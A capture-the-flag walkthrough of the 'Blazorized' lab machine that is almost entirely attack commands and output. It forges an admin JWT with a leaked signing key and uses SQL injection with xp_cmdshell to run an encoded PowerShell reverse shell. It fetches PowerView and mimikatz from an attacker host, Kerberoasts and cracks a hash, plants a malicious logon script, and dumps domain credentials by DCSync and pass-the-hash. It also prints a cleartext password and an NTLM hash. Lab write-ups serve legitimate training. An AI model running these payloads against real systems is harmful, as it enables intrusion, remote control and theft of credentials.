Explore the fundamentals of cybersecurity in the Blazorized Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

10.10.11.22 blazorized.htb admin.blazorized.htb

Script to add hosts automatically

ip="10.10.11.22"
domain="blazorized.htb admin.blazorized.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

nmap -sCV blazorized.htb

Host is up (0.048s latency).
Not shown: 986 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Mozhar's Digital Garden
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-01 22:20:28Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
1433/tcp open  ms-sql-s      Microsoft SQL Server 2022
|_ssl-date: 2024-11-01T22:20:39+00:00; -1s from scanner time.
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-11-01T22:17:59
|_Not valid after:  2054-11-01T22:17:59
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: blazorized.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: Host: DC1; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time:
|   date: 2024-11-01T22:20:33
|_  start_date: N/A
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required

Subdomains

To discover subdomains for the blazorized.htb domain using ffuf, run the following command:

ffuf -c -u "http://blazorized.htb" -H "host: FUZZ.blazorized.htb" -w /usr/share/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -fc 301,302,404 -mc all

Result:

admin                   [Status: 200, Size: 2017, Words: 149, Lines: 28, Duration: 65ms]

Analyzing Framework Files

You can retrieve Blazor framework files using curl. For instance, to get the blazor.server.js file:

curl -s http://blazorized.htb/_framework/blazor.server.js | grep '_framework/'

To beautify and print the Blazor WebAssembly file:

curl -s http://blazorized.htb/_framework/blazor.webassembly.js | prettier --parser babel | grep '_framework/'

curl -s http://blazorized.htb/_framework/blazor.boot.json | jq '.resources.lazyAssembly'

To download the Blazorized.Helpers.dll, use:

wget http://blazorized.htb/_framework/Blazorized.Helpers.dll

For analyzing the downloaded DLL, you can use AvaloniaILSpy or dnSpy.

  • Preferred Tool: I recommend using AvaloniaILSpy since it runs on Mono and is less likely to crash on Linux.

Finding JWT Information

  1. Open Blazorized.Helpers in AvaloniaILSpy.
  2. Navigate to the Blazorized.Helpers.JWT section.
  3. Look for hardcoded payload information used for JWT creation.

Crafting Admin Coockie



```python
import jwt
import datetime

key = '8697800004ee25fc33436978ab6e2ed6ee1a97da699a53a53d96cc4d08519e185d14727ca18728bf1efcde454eea6f65b8d466a4fb6550d5c795d9d9176ea6cf021ef9fa21ffc25ac40ed80f4a4473fc1ed10e69eaf957cfc4c67057e547fadfca95697242a2ffb21461e7f554caa4ab7db07d2d897e7dfbe2c0abbaf27f215c0ac51742c7fd58c3cbb89e55ebb4d96c8ab4234f2328e43e095c0f55f79704c49f07d5890236fe6b4fb50dcd770e0936a183d36e4d544dd4e9a40f5ccf6d471bc7f2e53376893ee7c699f48ef392b382839a845394b6b93a5179d33db24a2963f4ab0722c9bb15d361a34350a002de648f13ad8620750495bff687aa6e2f298429d6c12371be19b0daa77d40214cd6598f595712a952c20eddaae76a28d89fb15fa7c677d336e44e9642634f32a0127a5bee80838f435f163ee9b61a67e9fb2f178a0c7c96f160687e7626497115777b80b7b8133cef9a661892c1682ea2f67dd8f8993c87c8c9c32e093d2ade80464097e6e2d8cf1ff32bdbcd3dfd24ec4134fef2c544c75d5830285f55a34a525c7fad4b4fe8d2f11af289a1003a7034070c487a18602421988b74cc40eed4ee3d4c1bb747ae922c0b49fa770ff510726a4ea3ed5f8bf0b8f5e1684fb1bccb6494ea6cc2d73267f6517d2090af74ceded8c1cd32f3617f0da00bf1959d248e48912b26c3f574a1912ef1fcc2e77a28b53d0a'
issuer = 'http://api.blazorized.htb'
audience = 'http://admin.blazorized.htb'

email = "superadmin@blazorized.htb"
role = "Super_Admin"

expiration = datetime.datetime.now(datetime.timezone.utc) + datetime.timedelta(seconds=60)

payload = {
    "http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress": email,
    "http://schemas.microsoft.com/ws/2008/06/identity/claims/role": role,
    "iss": issuer,
    "aud": audience,
    "exp": int(expiration.timestamp()),
    "iat": int(datetime.datetime.now(datetime.timezone.utc).timestamp())
}

token = jwt.encode(payload, key, algorithm="HS512")
print(token)
```

### Accessing Admin Pages
- **Store JWT**: Save the JWT token in local storage:
  ```javascript
  localStorage.setItem('jwt', '<your_jwt_token_here>');
  ```
- **Gain Access**: Access the following admin URLs:
  - [Admin Home](http://admin.blazorized.htb/home)
  - [Check Duplicate Post Title](http://admin.blazorized.htb/check-duplicate-post-title)

### SQL Injection
- **Testing for Vulnerabilities**:
  - Test with these payloads:
    - `pwn' or 1=1 --`
    - `pwn' or 1=2 --`
  - Different responses indicate a vulnerability.

- **Network Monitoring**:
- Monitor ICMP traffic:
```bash
sudo tcpdump -i any icmp
```

- **Command Execution**:
- Execute commands via SQL injection:
```sql
pwn'; EXEC master..xp_cmdshell 'ping 10.10.14.17';-- -
```

**Note**: This confirms the command execution functionality within the database.

### SQL Revshell

- **Listening for Connections**:
- Start a listener on port 9001 using Netcat:
```bash
nc -lvnp 9001
```

- **Payload Generation**:
- Use the following command to create a PowerShell reverse shell payload:
```bash
echo -n '$client = New-Object System.Net.Sockets.TCPClient("'$(ip a | grep -A 2 "tun0:" | grep -oP "(?<=inet\s)\d+(\.\d+){3}")'",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -f UTF-8 -t UTF-16LE | base64 -w 0
```

- **Execute the Payload via SQL Injection**:
- Use the following SQL injection command to execute the payload:
```sql
pwn'; EXEC master..xp_cmdshell 'powershell -e <payload>';--
```

- **To read the flag**:
```powershell
type \users\nu_1055\Desktop\user.txt
```

### PowerView.ps1

- Download PowerView:
```bash
curl http://10.10.14.17:8000/PowerView.ps1 -o PowerView.ps1
. ./PowerView.ps1
```

- Find interesting domain ACLs:
```powershell
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "nu_1055"}
Get-NetUser -SPN | select serviceprincipalname
```

- **Kerberoasting Guide**:
  - Reference: [HackTricks - Kerberoasting](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast?source=post_page-----894f707082a7--------------------------------)

- **Set a Domain Object and Get Domain SPN Ticket**:
```powershell
Set-DomainObject -Identity RSA_4810 -SET @{serviceprincipalname='pwn/domain'}
Get-DomainSPNTicket -SPN pwn/domain
```

Brute Force the Hash

echo -n "Password Hash? -->" ; read hash
echo "$hash" > /tmp/hash.txt
hashcat 13100 -a 0 /tmp/hash.txt /usr/share/dict/rockyou.txt
hashcat /tmp/hash.txt --show
rm -rf /tmp/hash.txt



```bash
evil-winrm -i blazorized.htb -p '(Ni7856Do9854Ki05Ng0005 #)' -u RSA_4810
```

PowerView Usage for User Enumeration:

```bash
upload .local/www/win/enum/PowerView.ps1
Import-Module ./PowerView.ps1
Get-NetUser
```

**Output Example**:
```
samaccounttype        : USER_OBJECT
accountexpires        : NEVER
```

- Insert the `ScriptPath` for the `RSA-4810` account, granting full access to the suspicious account. The `shell.bat` file will execute whenever `SSA_6010` logs in:
  
```powershell
Set-ADUser -Identity SSA_6010 -ScriptPath "A32FF3AEAA23\shell.bat"
```

Listener:

```bash
nc -vnp 9002
```

Payload:

```bash
echo -n '$client = New-Object System.Net.Sockets.TCPClient("'$(ip a | grep -A 2 "tun0:" | grep -oP "(?<=inet\s)\d+(\.\d+){3}")'",9002);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -f UTF-8 -t UTF-16LE | base64 -w 0
```

```powershell
'powershell -e <payload>' | Out-File -FilePath C:\Windows\sysvol\domain\scripts\A32FF3AEAA23\shell.bat -Encoding ASCII
```

```bash
cd \users\ssa_6010
curl http://10.10.14.17:8000/mimikatz.exe -o mimikatz.exe
.\mimikatz.exe "privilege::debug" "lsadump::dcsync /user:administrator" "exit"
```

```bash
secretsdump.py WORKGROUP/Administrator@10.10.11.22 -hashes :f55ed1465179ba374ec1cad05b34a5f3
```

```bash
evil-winrm -i blazorized.htb -H 'f55ed1465179ba374ec1cad05b34a5f3' -u administrator
```

```powershell
type \users\administrator\desktop\root.txt
```